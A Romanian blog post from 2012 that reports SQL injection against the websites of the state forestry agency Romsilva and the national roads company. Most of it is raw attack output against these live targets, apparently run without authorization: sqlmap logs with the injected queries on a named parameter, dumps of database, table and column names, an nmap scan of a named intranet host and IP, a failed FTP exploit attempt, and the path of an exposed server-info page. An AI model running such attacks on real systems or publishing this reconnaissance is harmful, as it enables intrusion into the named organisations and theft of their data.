Regia Nationala a Padurilor – ROMSILVA – sql injection

24/02/2012 § 2 comentarii

Site-ul Regiei Nationale a Paduriilor Romsilva este in aceasi “oala” ca cel prezentat in exemplul trecut privind ajofmhd.ro

(clik pe foto pt.marire)

(clik pe foto pt.marire)

(clik pe foto pt.marire)

(clik pe foto pt.marire)

co@linux:~/.sqlmap/output/www.rosilva.ro$ cat log
current database: ‘site_rnp’

available databases [60]:
[*] act_ses
[*] adm
[*] agenti
[*] anunturi
[*] apo
[*] banci_zi
[*] buila
[*] cacti
[*] comert
[*] contnet
[*] contran
[*] contran_old
[*] directii
[*] e-docs
[*] Economic
[*] examene
[*] examentai
[*] factneinc
[*] fructe
[*] http
[*] information_schema
[*] inv
[*] legea1
[*] legea1old
[*] licitatii
[*] mapdr_legi
[*] mymarket
[*] mysql
[*] netacct
[*] netsilva
[*] opprim
[*] optoamna
[*] pastrav
[*] pepiniere
[*] pers
[*] postfix
[*] pp
[*] ProSilvaFondNet
[*] regenerare
[*] registru
[*] resumane
[*] rezerva
[*] rnp
[*] rnpeng
[*] rnpforum
[*] rosilva
[*] silv1eff
[*] silv1eff_2008
[*] silv1eff_save
[*] silv3
[*] silv4
[*] site_rnp
[*] site_rnp_en
[*] test
[*] test_licit
[*] tst
[*] vanatoare
[*] vpn
[*] WEBREPORTS
[*] xoops

Database: registru
[9 tables]
+————-+
| dcom |
| ddezv |
| decon |
| Destinatie |
| dff |
| dgen |
| Documente1 |
| Provenienta |
| user |
+————-+

Database: registru
Table: Documente1
[8 columns]
+———–+————–+
| Column | Type |
+———–+————–+
| Continut | text |
| DataInreg | date |
| Dest | varchar(40) |
| IdInreg | int(11) |
| loc_inreg | varchar(20) |
| NrDoc | varchar(40) |
| NrInreg | int(11) |
| Prov | varchar(100) |
+———–+————–+

Database: site_rnp
[13 tables]
+—————–+
| articole |
| categorii |
| comment |
| contactds |
| contactrnp |
| declaratii |
| directii |
| functiidir |
| multimedia |
| news |
| subcategorii |
| subsubcategorii |
| unitati |
+—————–+

Database: site_rnp
Table: functiidir
[4 columns]
+———+————–+
| Column | Type |
+———+————–+
| id | int(5) |
| nivel | int(1) |
| numefct | varchar(120) |
| ordine | int(1) |
+———+————–+

Database: site_rnp
Table: functiidir
[13 entries]
+—-+
| id |
+—-+
| 1 |
| 2 |
| 3 |
| 4 |
| 5 |
| 6 |
| 7 |
| 8 |
| 9 |
| 10 |
| 11 |
| 12 |
| 13 |
+—-+

Database: site_rnp
Table: functiidir
[13 entries]
+———-+
| nume_fct |
+———-+
| NULL |
| NULL |
| NULL |
| NULL |
| NULL |
| NULL |
| NULL |
| NULL |
| NULL |
| NULL |
| NULL |
| NULL |
| NULL |
+———-+

Database: site_rnp
Table: functiidir
[13 entries]
+——–+
| ordine |
+——–+
| NULL |
| NULL |
| NULL |
| NULL |
| NULL |
| NULL |
| 1 |
| 3 |
| 2 |
| NULL |
| NULL |
| NULL |
| NULL |
+——–+

Starting Nmap 5.00 ( http://nmap.org ) at 2012-02-23 22:30 CET
Interesting ports on intranet.rosilva.ro (86.34.169.35):
Not shown: 835 closed ports, 160 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp (Generally vsftp or WU-FTPD)
25/tcp open smtp Sendmail 8.13.8/8.13.8
53/tcp open domain
80/tcp open http Apache httpd 2.2.3 ((CentOS))
3306/tcp open mysql MySQL 5.0.77
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port21-TCP:V=5.00%I=7%D=2/23%Time=4F46B108%P=i686-pc-linux-gnu%r(NULL,2
SF:5,”220\x20AVETI\x20GRIJA\x20CE\x20SCRIETI\x20P’ACILEA\r\n”)%r(GenericLi
SF:nes,71,”220\x20AVETI\x20GRIJA\x20CE\x20SCRIETI\x20P’ACILEA\r\n530\x20Pl
SF:ease\x20login\x20with\x20USER\x20and\x20PASS\.\r\n530\x20Please\x20logi
SF:n\x20with\x20USER\x20and\x20PASS\.\r\n”)%r(Help,4B,”220\x20AVETI\x20GRI
SF:JA\x20CE\x20SCRIETI\x20P’ACILEA\r\n530\x20Please\x20login\x20with\x20US
SF:ER\x20and\x20PASS\.\r\n”)%r(SMBProgNeg,25,”220\x20AVETI\x20GRIJA\x20CE\
SF:x20SCRIETI\x20P’ACILEA\r\n”);
Service Info: Host: rosilva.rosilva.ro; OS: Unix

[*] Banner: 220 AVETI GRIJA CE SCRIETI P’ACILEA
[*] USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

Si asta a fost cea mai tare “AVETI GRIJA CE SCRIETI P’ACILEA” :))) :)) :))

La fel se afla si Compania de autostrazi si drumuri nationale Romania http://www.cnadnr.ro

web server operating system: Linux Fedora
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0

[09:05:53] [INFO] fetching current database
[09:05:53] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
[09:05:53] [INFO] retrieved: cnadnr
[09:07:45] [INFO] performed 48 queries in 111 seconds
current database: ‘cnadnr’

[09:07:45] [INFO] Fetched data logged to text files under ‘/home/co/.sqlmap/output/www.cnadnr.ro’

[*] shutting down at: 09:07:45

09:08:26] [INFO] testing connection to the target url
[09:08:29] [INFO] testing if the url is stable, wait a few seconds
[09:08:35] [INFO] url is stable
[09:08:35] [INFO] testing if User-Agent parameter ‘User-Agent’ is dynamic
[09:08:40] [WARNING] User-Agent parameter ‘User-Agent’ is not dynamic
[09:08:40] [INFO] testing if GET parameter ‘idg’ is dynamic
[09:08:42] [INFO] confirming that GET parameter ‘idg’ is dynamic
[09:08:45] [INFO] GET parameter ‘idg’ is dynamic
[09:08:45] [INFO] testing sql injection on GET parameter ‘idg’ with 0 parenthesis
[09:08:45] [INFO] testing unescaped numeric injection on GET parameter ‘idg’
[09:08:50] [INFO] confirming unescaped numeric injection on GET parameter ‘idg’
[09:08:52] [INFO] GET parameter ‘idg’ is unescaped numeric injectable with 0 parenthesis
[09:08:52] [INFO] testing for parenthesis on injectable parameter
[09:08:58] [INFO] the injectable parameter requires 0 parenthesis
[09:08:58] [INFO] testing MySQL
[09:09:02] [INFO] confirming MySQL
[09:09:06] [INFO] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1
[09:09:06] [INFO] retrieved: 2
[09:09:37] [INFO] performed 13 queries in 31 seconds
[09:09:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0

[09:09:37] [INFO] fetching database names
[09:09:37] [INFO] fetching number of databases
[09:09:37] [INFO] query: SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR(10000)), CHAR(32)) FROM information_schema.SCHEMATA
[09:09:37] [INFO] retrieved: 3
[09:10:09] [INFO] performed 13 queries in 32 seconds
[09:10:09] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1
[09:10:09] [INFO] retrieved: information_schema
[09:17:03] [INFO] performed 132 queries in 413 seconds
[09:17:03] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 1, 1
[09:17:03] [INFO] retrieved: cnadnr
[09:19:21] [INFO] performed 48 queries in 137 seconds
[09:19:21] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 2, 1
[09:19:21] [INFO] retrieved: test
[09:20:38] [INFO] performed 34 queries in 76 seconds
available databases [3]:
[*] cnadnr
[*] information_schema
[*] test

Se pare ca majoritatea serverelor apartinand mariilor companii sau de stat sunt sub orice critica (varza) pe partea cu securitatea,asa ca nu ma mir cum de se sparg o multime de site-uri precum cele enumerate mai sus.Asa se ajunge prin massmedia cu o gramada de interpretari gresite precum ” site-ul X a fost ras de hackeri” sau a fost spart de anonymous sau multe altele.Atat timp cat serverul respectiv e updatat la zi cu programele principale (sshd,ftpd,mysql,apache,etc) riscul de a fi hackuit este extrem mic,aproape NULL.
Si asta pana se gaseste unu sa gaseasca un bug iar ulterior un exploit :)

http://www.rosilva.ro/i/poze/nfo.php – info server :
System Linux rosilva.rosilva.ro 2.6.18-274.el5 #1 SMP Fri Jul 22 04:43:29 EDT 2011 x86_64

Articol similar : https://cosmen.wordpress.com/2012/02/22/ajofmhd-ro-down/

About these ads

Etichetat: , , , , , , , , , , , , ,

§ 2 Responses to Regia Nationala a Padurilor – ROMSILVA – sql injection

Lasă un răspuns

Completeaza detaliile de mai jos sau apasa click pe una din imagini pentru a te loga:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Schimbă )

Twitter picture

You are commenting using your Twitter account. Log Out / Schimbă )

Facebook photo

You are commenting using your Facebook account. Log Out / Schimbă )

Google+ photo

You are commenting using your Google+ account. Log Out / Schimbă )

Connecting to %s

Ce este asta?

You are currently reading Regia Nationala a Padurilor – ROMSILVA – sql injection at Cosme.

meta

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: